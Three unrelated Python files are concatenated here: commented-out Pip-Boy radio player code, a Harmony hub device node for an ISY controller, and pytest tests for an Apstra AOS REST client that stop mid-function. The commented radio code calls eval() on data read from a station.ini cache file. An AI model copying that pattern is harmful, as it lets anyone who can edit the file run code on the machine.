# self.menu = pypboy.ui.Menu(self.station_menu, stationCallbacks, settings.STATION)
# self.menu.rect[0] = settings.menu_x
# self.menu.rect[1] = settings.menu_y
# self.add(self.menu)
# # self.menu.select(settings.STATION)
#
# self.footer = pypboy.ui.Footer(settings.FOOTER_RADIO)
# self.footer.rect[0] = settings.footer_x
# self.footer.rect[1] = settings.footer_y
# self.add(self.footer)
#
# def select_station(self, station):
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.new_selection = True
# # self.active_station.stop()
# self.active_station = self.stations[station]
# settings.STATION = station
# self.active_station.play_song()
#
# def handle_event(self, event):
# if event.type == settings.EVENTS['SONG_END']:
# if hasattr(self, 'active_station') and self.active_station:
# if self.active_station.new_selection:
# self.active_station.new_selection = False
# else:
# self.active_station.files.rotate(-1)
# self.active_station.song_lengths.rotate(-1)
# self.active_station.play_song()
# self.active_station.new_selection = False
# print("Song ended, Playing next song")
# elif event.type == pygame.KEYDOWN:
# if event.key == pygame.K_PAGEUP:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.volume_up()
# elif event.key == pygame.K_PAGEDOWN:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.volume_down()
# elif event.key == pygame.K_END:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.next_song()
# elif event.key == pygame.K_HOME:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.prev_song()
# elif event.key == pygame.K_DELETE:
# if hasattr(self, 'active_station') and self.active_station:
# self.active_station.randomize_station()
#
# def get_station_data(self):
#
# # Get list of folders
# folders = []
# stations = []
# self.station_name = None
# self.station_ordered = True
#
# for f in sorted(os.listdir(self.audiofolders)):
# if not f.endswith("/"):
# folders.append(self.audiofolders + f)
#
# for folder in folders:
# config = configparser.SafeConfigParser()
#
# folder_name = os.path.basename(folder) # Get the folder name without the full path
# if len(glob.glob(folder + "/*.ogg")) == 0:
# print("No .ogg files in:", folder)
# continue
#
# song_data = self.load_files(folder)
# self.station_files = song_data[0]
# self.station_lengths = song_data[1]
#
# self.station_meta_data_file = ("./" + folder + "/" + "station.ini")
#
# try:
# assert os.path.exists(self.station_meta_data_file)
# config.read(self.station_meta_data_file, encoding=None)
# except Exception as e:
# print("Error reading the following:", str(e))
#
# try:
# self.station_name = config.get('metadata', 'station_name')
# self.station_ordered = config.get('metadata', 'ordered')
# except Exception as e:
# self.station_name = folder_name
# self.station_ordered = True
# print(str(e), ' could not read configuration file')
# if not settings.do_not_use_cache:
# try:
# print("Loaded cached waveforms in file", self.station_meta_data_file)
# self.station_waveforms = config.get('cache', 'waveforms')
# except Exception as e:
# self.station_waveforms = []
# print(str(e), ' No cache section in', self.station_meta_data_file)
# else:
# print("Using live waveform generation")
# self.station_waveforms = []
#
# self.total_length = sum(self.station_lengths)
#
# if not self.station_waveforms and not settings.do_not_use_cache or settings.force_caching: # Write cached data
# self.station_waveforms = self.process_waveforms(folder)
# print("Writing cache data to ", self.station_meta_data_file)
# try:
# config.add_section("metadata")
# config.set("metadata", "station_name", str(self.station_name))
# config.set("metadata", "ordered", str(self.station_ordered))
# except Exception as e:
# print(str(e))
# try:
# config.add_section("cache")
# except Exception as e:
# print(str(e))
# config.set("cache", "waveforms", str(self.station_waveforms))
# with open(self.station_meta_data_file, 'w') as configfile:
# config.write(configfile)
#
# if not self.station_ordered:
# seed = random.random()
# random.Random(seed).shuffle(self.station_files)
# random.Random(seed).shuffle(self.station_lengths)
# random.Random(seed).shuffle(self.station_waveforms)
#
# station_data = self.station_name, folder, self.station_files, self.station_ordered, self.station_lengths, self.total_length, self.station_waveforms
# stations.append(station_data)
#
# return stations
#
#
# def process_waveforms(self, folder):
# print("started processing waveforms in folder", folder, "this may take a while")
# now = time.time()
# waveforms = []
# for file in sorted(os.listdir(folder)):
# if file.endswith(".ogg"):
# print("Processing waveforms for file = ", file)
# frame_skip = int(48000 / 75) # sample rate / (25 fps * 3 pixels shift per frame)
# amplitude = pygame.sndarray.array(
# pygame.mixer.Sound("./" + folder + "/" + file)) # Load the sound file)
# amplitude = amplitude[:, 0] + amplitude[:, 1]
#
# amplitude = amplitude[::frame_skip]
# # frequency = list(abs(fft.fft(amplitude)))
#
# # scale the amplitude to 1/4th of the frame height and translate it to height/2(central line)
# max_amplitude = max(amplitude)
# for i in range(len(amplitude)):
# amplitude[i] = float(amplitude[i]) / max_amplitude * 100 + 125
#
# waveform = [125] * 250 + list(amplitude)
# for x in range(125): # Add end frames
# waveform.append(125)
# waveforms.append(waveform)
# print("Finished processing waveforms in folder", folder, "Time:", time.time() - now)
# return waveforms
#
# def load_files(self, folder):
# files = []
# song_lengths = []
#
# for file in sorted(os.listdir(folder)):
# if file.endswith(".ogg"):
# files.append("./" + folder + "/" + file)
# song_lengths.append(mutagen.File("./" + folder + "/" + file).info.length)
#
# return [files, song_lengths]
#
#
# class Animation(game.Entity):
#
# def __init__(self):
# super(Animation, self).__init__()
#
# self.width, self.height = 250, 250
# self.center = [self.width / 2, self.height / 2]
# self.image = pygame.Surface((self.width, self.height))
# self.animation_time = 0.04 # 25 fps
# self.prev_time = 0
# self.index = 0
# self.prev_song = None
#
# def render(self, *args, **kwargs):
# global waveform
# self.current_time = time.time()
# self.delta_time = self.current_time - self.prev_time
#
# if self.delta_time >= self.animation_time:
# self.prev_time = self.current_time
#
# if not song:
# self.image.fill((0, 0, 0))
# pygame.draw.line(self.image, [0, 255, 0], [0, self.height / 2], [self.width, self.height / 2], 2)
#
# elif song:
# self.image.fill((0, 0, 0))
# self.index += 3
#
# if song != self.prev_song:
# self.prev_song = song
#
# if waveform:
# print("Loading cached waveform for", song, "Waveform length =", len(waveform))
# else:
# print("Generating waveform from", song, "Waveform length =", len(waveform))
# frame_skip = int(48000 / 75)
# amplitude = pygame.sndarray.array(pygame.mixer.Sound(song)) # Load the sound file)
# amplitude = amplitude[:, 0] + amplitude[:, 1]
#
# amplitude = amplitude[::frame_skip]
#
# # scale the amplitude to 1/4th of the frame height and translate it to height/2(central line)
# max_amplitude = max(amplitude)
# for i in range(len(amplitude)):
# amplitude[i] = float(amplitude[i]) / max_amplitude * int(
# self.height / 2.5) + self.height / 2
#
# waveform = [int(self.height / 2)] * self.width + list(amplitude)
# for x in range(125): # Add end frames
# waveform.append(125)
#
# # print("new start position = ",settings.START_POS)
# if not start_pos == 0:
# self.index = int(start_pos * 75) # Adjust for new start position
# else:
# self.index = 5
# # print("New index=", self.index)
# length = len(waveform)
# if self.index >= length - 5:
# self.index = 0
#
# if length > 0:
# prev_x, prev_y = 0, waveform[self.index]
# for x, y in enumerate(waveform[self.index + 1:self.index + 1 + self.width][::1]):
# pygame.draw.line(self.image, [0, 255, 0], [prev_x, prev_y], [x, y], 2)
# prev_x, prev_y = x, y
#
# # Credit to https://github.com/prtx/Music-Visualizer-in-Python/blob/master/music_visualizer.py
#
#
# class Grid(game.Entity):
#
# def __init__(self):
# super(Grid, self).__init__()
#
# self.image = pygame.Surface((270, 270))
# self.image.fill((0, 0, 0))
# long_line = 14
# long_lines = 10
# short_line = 9
# short_lines = long_lines * 3
# line_start = 0
# bottom = self.image.get_rect().bottom
# right = self.image.get_rect().right
#
# pygame.draw.lines(self.image, settings.light, False, [(0, 268), (268, 268), (268, 0)], 3)
#
# line_x = int(self.image.get_rect().height / long_lines)
# while long_lines >= 1:
# line_start += line_x
# pygame.draw.line(self.image, settings.light, (line_start, bottom), (line_start, bottom - long_line), 2)
# pygame.draw.line(self.image, settings.light, (right, line_start), (right - long_line, line_start), 2)
# long_lines -= 1
#
# line_start = 0
# line_x = int(self.image.get_rect().height / short_lines)
# while short_lines > 2:
# line_start += line_x
# pygame.draw.line(self.image, settings.light, (line_start, bottom), (line_start, bottom - short_line), 2)
# pygame.draw.line(self.image, settings.light, (right, line_start), (right - short_line, line_start), 2)
# short_lines -= 1
#
#
# class RadioStation(game.Entity):
# STATES = {
# 'stopped': 0,
# 'playing': 1,
# 'paused': 2
# }
#
# def __init__(self, *args, **kwargs):
# super(RadioStation, self).__init__((10, 10), *args, **kwargs)
# self.state = self.STATES['stopped']
#
# self.station_length = 0
# self.filename = 0
# # self.files = deque([])
# # self.files = self.load_files()
# self.new_selection = True
# self.last_filename = None
# self.start_time = time.time()
#
# pygame.mixer.music.set_endevent(settings.EVENTS['SONG_END'])
#
# def play_song(self):
# global song, start_pos, waveform
# self.start_pos = 0
# if settings.SOUND_ENABLED:
# if self.files[0].endswith("Silence.ogg"):
# settings.AMPLITUDE = []
# song = None
# start_pos = 0
# waveform = []
# settings.FOOTER_RADIO[0] = ""
#
# print("Radio off")
# self.stop()
# else:
# if hasattr(self, 'last_filename') and self.last_filename: # Support resuming
# self.start_pos = self.last_playpos + (time.time() - self.last_playtime)
# print("Resuming song:", self.last_filename)
#
# if self.files:
# if self.new_selection: # If changed stations manually
# song_length = self.song_lengths[0] # length of the current song
# self.start_pos = time.time() - self.start_time
# # print("time based start_pos =", self.start_pos)
#
# if self.start_pos > song_length:
# i = 0
# lengths = list(self.song_lengths)
# if self.start_pos > self.station_length:
# print("start_pos longer than station length", self.start_pos, self.station_length)
# self.start_time = time.time()
# self.start_pos = 0
# else:
# # Find where in the station list we should be base on current time
# while sum(lengths[0:i]) <= self.start_pos:
# i += 1
# self.files.rotate(-1)
# self.song_lengths.rotate(-1)
# if self.waveforms:
# self.waveforms.rotate(-1)
#
# i -= 1 # compensate for overshoot
# self.files.rotate(1)
# self.song_lengths.rotate(1)
# if self.waveforms:
# self.waveforms.rotate(1)
#
# self.sum_of_song_lengths = sum(lengths[0:i])
# self.start_pos = self.start_pos - self.sum_of_song_lengths
# self.start_time = time.time() - self.start_pos
# print("Jumping to song index: :", i,
# "New Song Length =", lengths[i],
# "start_pos =", self.start_pos,
# "self.sum_of_song_lengths", self.sum_of_song_lengths
# )
#
# self.new_selection = False
#
# else:
# # print("Same station, new song")
# self.start_pos = 0
# if self.waveforms:
# self.waveforms.rotate(1)
#
# self.filename = self.files[0]
#
#
# song = self.filename
# start_pos = self.start_pos
#
# if self.waveforms:
# waveform = self.waveforms[0]
#
# print("Playing =", self.filename,
# "length =", str(round(self.song_lengths[0], 2)),
# "start_pos =", str(round(self.start_pos, 2))
# )
# song_meta_data = mutagen.File(self.filename, easy=True)
# print (song_meta_data)
# song_artist = str(song_meta_data['artist'])
# song_title = str(song_meta_data['title'])
# song_title = song_title.strip("['").strip("']")
# song_artist = song_artist.strip("['").strip("']")
#
# settings.FOOTER_RADIO[0] = song_artist + " / " + song_title
# pygame.mixer.music.load(self.filename)
# pygame.mixer.music.play(0, self.start_pos)
# self.state = self.STATES['playing']
#
# def volume_up(self):
# if settings.SOUND_ENABLED:
# print("Volume up")
# settings.VOLUME = settings.VOLUME + 0.1
# pygame.mixer.music.set_volume(settings.VOLUME)
#
# def volume_down(self):
# if settings.SOUND_ENABLED:
# print("Volume down")
# settings.VOLUME = settings.VOLUME - 0.1
# pygame.mixer.music.set_volume(settings.VOLUME)
#
# def play(self):
# if settings.SOUND_ENABLED:
# if self.state == self.STATES['paused']:
# pygame.mixer.music.unpause()
# self.state = self.STATES['playing']
# else:
# self.play_song()
# print("Music resumed")
#
# def pause(self):
# if settings.SOUND_ENABLED:
# self.state = self.STATES['paused']
# pygame.mixer.music.pause()
# settings.ACTIVE_SONG = None
# print("Music paused")
#
# def stop(self):
# if settings.SOUND_ENABLED:
# self.state = self.STATES['stopped']
# if self.filename:
# self.last_filename = self.filename
# self.last_playpos = pygame.mixer.music.get_pos()
# self.last_playtime = time.time()
# settings.ACTIVE_SONG = None
# pygame.mixer.music.stop()
# print("Music stopped")
#
# def next_song(self):
# if settings.SOUND_ENABLED:
# print("Next song")
# self.files.rotate(-1)
# self.song_lengths.rotate(-1)
# if self.waveforms:
# self.waveforms.rotate(-1)
# self.start_time = time.time()
# self.play_song()
#
# def prev_song(self):
# if settings.SOUND_ENABLED:
# print("Prev song")
# self.files.rotate(1)
# self.song_lengths.rotate(1)
# if self.waveforms:
# self.waveforms.rotate(1)
# self.start_time = time.time()
# self.play_song()
#
# def randomize_station(self):
# seed = random.random()
# random.Random(seed).shuffle(self.files)
# random.Random(seed).shuffle(self.song_lengths)
# print("Randomized song order")
#
# def __le__(self, other):
# if type(other) is not RadioStation:
# return 0
# else:
# return self.label <= other.label
#
# def __ge__(self, other):
# if type(other) is not RadioStation:
# return 0
# else:
# return self.label >= other.label
#
#
# class RadioClass(RadioStation):
# def __init__(self, station_name, station_folder, station_data, *args, **kwargs):
# # self.station_data = [folder, station_name, station_files, station_ordered, station_lengths, station_waveforms]
#
# self.label = station_name
# self.directory = station_folder
# self.files = deque(station_data[2])
# self.song_lengths = deque(station_data[4])
# self.total_length = station_data[5]
# try:
# self.waveforms = deque(eval(station_data[6]))
# except:
# self.waveforms = []
#
# super(RadioClass, self).__init__(self, *args, **kwargs)
|
from udi_interface import Node,LOGGER
class Device(Node):
def __init__(self, parent, address, name):
# The id (node_def_id) is the address because each hub has a unique nodedef in the profile.
self.did = address
address = "d" + address
self.id = address
self.parent = parent
super(Device, self).__init__(parent.controller.poly, parent.address, address, name)
#self.name = name
#self.address = address
self.hub = parent
# Only Hub devices are polled.
self.do_poll = False
parent.controller.poly.subscribe(parent.controller.poly.START, self.handler_start, address)
def handler_start(self):
self.setDriver('ST', 1)
def setOn(self, command):
self.setDriver('ST', 1)
def setOff(self, command):
self.setDriver('ST', 0)
def query(self):
self.reportDrivers()
def _get_button_label(self,index):
"""
Convert from button/function index from nls to real label
because pyharmony needs the label.
"""
LOGGER.debug("index=%d" % (index))
# TODO: Make sure it's a valid index?
return self.parent.harmony_config['info']['functions'][index]['label']
def _get_button_command(self,index):
"""
Convert from button/function index from nls to real label
because pyharmony needs the label.
"""
LOGGER.debug("index=%d" % (index))
        if index < len(self.parent.harmony_config['info']['functions']):
if not self.did in self.parent.harmony_config['info']['functions'][index]['command']:
LOGGER.debug("This device id={0} not in command hash = {1}".format(self.did,self.parent.harmony_config['info']['functions'][index]['command']))
return False
command = self.parent.harmony_config['info']['functions'][index]['command'][self.did]
LOGGER.debug("command=%s" % (command))
return command
else:
LOGGER.debug("index={0} is not in functions len={1}: {2}".format(index,len(self.parent.harmony_config['info']['functions']),self.parent.harmony_config['info']['functions']))
return False
def _send_command_by_index(self,index):
LOGGER.debug("index=%d" % (index))
name = self._get_button_command(index)
if name is False:
LOGGER.debug("No name for index %d" % (index))
return False
LOGGER.debug("index=%d, name=%s" % (index,name))
return self._send_command(name)
def _send_command(self,name):
LOGGER.debug("name=%s" % (name))
# Push it to the Hub
if self.hub.client is None:
LOGGER.debug("No Client for command '%s'." % (name))
ret = False
else:
ret = self.hub.client.send_command(self.did,name)
LOGGER.debug("%s,%s result=%s" % (str(self.did),name,str(ret)))
# TODO: This always returns None :(
ret = True
return ret
def _cmd_set_button(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
index = int(command.get('value'))
LOGGER.debug("index=%d" % (index))
return self._send_command_by_index(index)
def _cmd_don(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
LOGGER.debug("")
# TODO: If no PowerOn command, do PowerToggle
return self._send_command('PowerOn')
def _cmd_dof(self, command):
"""
This runs when ISY calls set button which passes the button index
"""
LOGGER.debug("")
# TODO: If no PowerOn command, do PowerToggle
return self._send_command('PowerOff')
drivers = [{'driver': 'ST', 'value': 0, 'uom': 2}]
id = 'HarmonyDevice'
commands = {
'SET_BUTTON': _cmd_set_button,
'DON': _cmd_don,
'DOF': _cmd_dof,
}
|
# Copyright 2020-present, Apstra, Inc. All rights reserved.
#
# This source code is licensed under End User License Agreement found in the
# LICENSE file at http://www.apstra.com/eula
# pylint: disable=redefined-outer-name
import json
import pytest
from unittest import mock
from unittest.mock import call
from aos.client import AosClient
from aos.aos import AosRestAPI, AosAPIError, AosInputError
from aos.blueprint import (
Blueprint,
Device,
AosBPCommitError,
Anomaly,
SecurityZone,
VirtualNetwork,
ResourceGroup,
)
from requests.utils import requote_uri
from tests.util import make_session, read_fixture, deserialize_fixture
@pytest.fixture(params=["3.3.0", "4.0.0"])
def aos_api_version(request):
return request.param
@pytest.fixture
def aos_session():
return make_session()
@pytest.fixture
def aos(aos_session):
return AosClient(protocol="http", host="aos", port=80, session=aos_session)
@pytest.fixture
def expected_auth_headers():
headers = AosRestAPI.default_headers.copy()
headers["AuthToken"] = "token"
return headers
@pytest.fixture
def aos_logged_in(aos, aos_session):
successful_login_resp = {"token": "token", "id": "user-id"}
aos_session.add_response(
"POST",
"http://aos:80/api/aaa/login",
status=200,
resp=json.dumps(successful_login_resp),
)
resp = aos.auth.login(username="user", password="pass")
assert resp.token == "token"
aos_session.request.call_args_list.pop()
aos_session.request.call_count = aos_session.request.call_count - 1
return aos
def test_get_all_ids(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
assert aos_logged_in.blueprint.get_all_ids() == [
Blueprint(
id="evpn-cvx-virtual",
label="evpn-cvx-virtual",
),
Blueprint(
id="37e5bf9d-46e6-4479-85e9-96ecf47e00e0",
label="test",
),
]
aos_session.request.assert_called_once_with(
"GET",
"http://aos:80/api/blueprints",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_bp_by_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_name = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_name}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
resp = aos_logged_in.blueprint.get_bp(bp_name=bp_name)
assert resp["label"] == bp_name
assert resp["id"] == bp_name
assert resp["design"] == "two_stage_l3clos"
def test_get_bp_by_name_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_name = "BP-does-not-exist"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_name}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.get_bp(bp_name=bp_name)
def test_get_bp_by_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/single_blueprint.json"),
)
resp = aos_logged_in.blueprint.get_bp(bp_id=bp_id)
assert resp["label"] == bp_id
assert resp["id"] == bp_id
assert resp["design"] == "two_stage_l3clos"
def test_get_bp_by_id_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "BP-does-not-exist"
aos_session.add_response(
"GET",
"http://aos:80/api/blueprints",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprints.json"),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}",
status=404,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/blueprint_404.json"),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.get_bp(bp_id=bp_id)
def test_add_bp_by_temp_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_name = "lab_evpn_mlag"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_name,
}
bp_resp = {"id": "test-bp", "task_id": "test-bp"}
aos_session.add_response(
"GET",
"http://aos:80/api/design/templates",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/design/get_templates.json"),
)
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=201,
resp=json.dumps(bp_resp),
)
resp = aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_name=template_name
)
assert resp == bp_resp
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_name_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_name = "test-name-bad"
aos_session.add_response(
"GET",
"http://aos:80/api/design/templates",
status=200,
resp=read_fixture(f"aos/{aos_api_version}/design/get_templates.json"),
)
with pytest.raises(AosInputError):
aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_name=template_name
)
aos_session.request.assert_called_with(
"GET",
"http://aos:80/api/design/templates",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_id = "lab_evpn_mlag"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_id,
}
bp_resp = {"id": "test-bp", "task_id": "test-bp"}
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=201,
resp=json.dumps(bp_resp),
)
resp = aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_id=template_id
)
assert resp == bp_resp
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
def test_add_bp_by_temp_id_invalid(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
template_id = "1111-bad-id"
bp_body = {
"design": "two_stage_l3clos",
"init_type": "template_reference",
"label": "test-bp",
"template_id": template_id,
}
bp_resp = {"errors": {"template_id": "Design template not found: template_id"}}
aos_session.add_response(
"POST",
"http://aos:80/api/blueprints/",
status=422,
resp=json.dumps(bp_resp),
)
with pytest.raises(AosAPIError):
aos_logged_in.blueprint.add_blueprint(
label="test-bp", template_id=template_id
)
aos_session.request.assert_called_with(
"POST",
"http://aos:80/api/blueprints/",
params=None,
json=bp_body,
headers=expected_auth_headers,
)
# TODO (Ryan): Parameterize all resource_type and group_name options
def test_assign_asn_pool_to_bp(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
resource_type = "asn"
group_name = "spine_asns"
asn_pool_id = "evpn-asn"
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
status=202,
resp=json.dumps(""),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/{resource_type}"
f"/{group_name}",
status=200,
resp=json.dumps(
{"type": "asn", "name": "spine_asns", "pool_ids": [asn_pool_id]}
),
)
assert aos_logged_in.blueprint.apply_resource_groups(
bp_id=bp_id,
resource_type=resource_type,
group_name=group_name,
pool_ids=[asn_pool_id],
) == ResourceGroup(
type=resource_type,
name=group_name,
group_name=group_name,
pool_ids=[asn_pool_id],
)
rg_body = {
"pool_ids": [asn_pool_id],
}
aos_session.request.assert_has_calls(
[
call(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
params=None,
json=rg_body,
headers=expected_auth_headers,
),
call(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_name}",
json=None,
params=None,
headers=expected_auth_headers,
),
]
)
def test_commit_staging_errors(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=202,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/bp_staging_version.json"
),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/errors",
status=202,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/bp_errors_active.json"),
)
with pytest.raises(AosBPCommitError):
aos_logged_in.blueprint.commit_staging(bp_id, "test_test")
aos_session.request.assert_called_with(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
params=None,
json={"version": 3, "description": "test_test"},
headers=expected_auth_headers,
)
def test_commit_staging(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=202,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/bp_staging_version.json"
),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/errors",
status=202,
resp=read_fixture(f"aos/{aos_api_version}/blueprints/bp_errors_clear.json"),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
status=202,
resp=json.dumps(""),
)
aos_logged_in.blueprint.commit_staging(bp_id, "test_test")
aos_session.request.assert_called_with(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/deploy",
params=None,
json={"version": 3, "description": "test_test"},
headers=expected_auth_headers,
)
def test_get_deployed_devices(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/get_deployed_devices_devices.json"
),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/get_deployed_devices_mlag.json"
),
)
assert aos_logged_in.blueprint.get_deployed_devices(bp_id) == [
Device(
label="leaf3-leaf-switch",
system_id="84819c8a-a402-424e-94fd-90c459f046d9",
),
Device(
label="evpn_mlag_001_leaf_pair1",
system_id="d120c55b-4f40-4b10-8376-021fe099d632",
),
]
def test_get_security_zone_id(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
bp_id = "evpn-cvx-virtual"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
status=200,
resp=read_fixture(sz_fixture),
)
sz_dict = deserialize_fixture(sz_fixture)
assert aos_logged_in.blueprint.get_security_zone(
bp_id=bp_id, sz_id=sz_id
) == SecurityZone(
label=sz_dict["label"],
id=sz_id,
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_get_security_zone_name(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
sz_all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(sz_all_fixture),
)
sz_dict = deserialize_fixture(sz_fixture)
assert aos_logged_in.blueprint.find_sz_by_name(
bp_id=bp_id, name=sz_name
) == SecurityZone(
label=sz_name,
id=sz_dict["id"],
routing_policy=mock.ANY,
routing_policy_id=mock.ANY,
vni_id=sz_dict["vni_id"],
sz_type=sz_dict["sz_type"],
vrf_name=sz_dict["vrf_name"],
rt_policy=sz_dict["rt_policy"],
route_target=sz_dict["route_target"],
vlan_id=sz_dict["vlan_id"],
)
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
params=None,
json=None,
headers=expected_auth_headers,
)
def test_create_security_zone(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
sz_fixture = f"aos/{aos_api_version}/blueprints/get_security_zone_id.json"
tasks_fixture = f"aos/{aos_api_version}/blueprints/get_bp_tasks_complete.json"
task_id_fixture = f"aos/{aos_api_version}/blueprints/get_bp_task_id.json"
all_fixture = f"aos/{aos_api_version}/blueprints/get_security_zones.json"
bp_id = "evpn-cvx-virtual"
sz_name = "blue"
create_task_id = "d20a8a52-d311-4df7-a8ec-271d8e2325d1"
sz_id = "78eff7d7-e936-4e6e-a9f7-079b9aa45f98"
resource_type = "ip"
group_name = "leaf_loopback_ips"
group_path = requote_uri(f"sz:{sz_id},{group_name}")
pool_id = "leaf-loopback-pool-id"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
params={"async": "full"},
resp=json.dumps({"task_id": create_task_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
status=200,
resp=read_fixture(tasks_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks/{create_task_id}",
status=200,
resp=read_fixture(task_id_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones",
status=200,
resp=read_fixture(all_fixture),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}",
status=200,
resp=read_fixture(sz_fixture),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/resource_groups/"
f"{resource_type}/{group_path}",
status=202,
resp=json.dumps(""),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/security-zones/{sz_id}/dhcp-servers",
status=204,
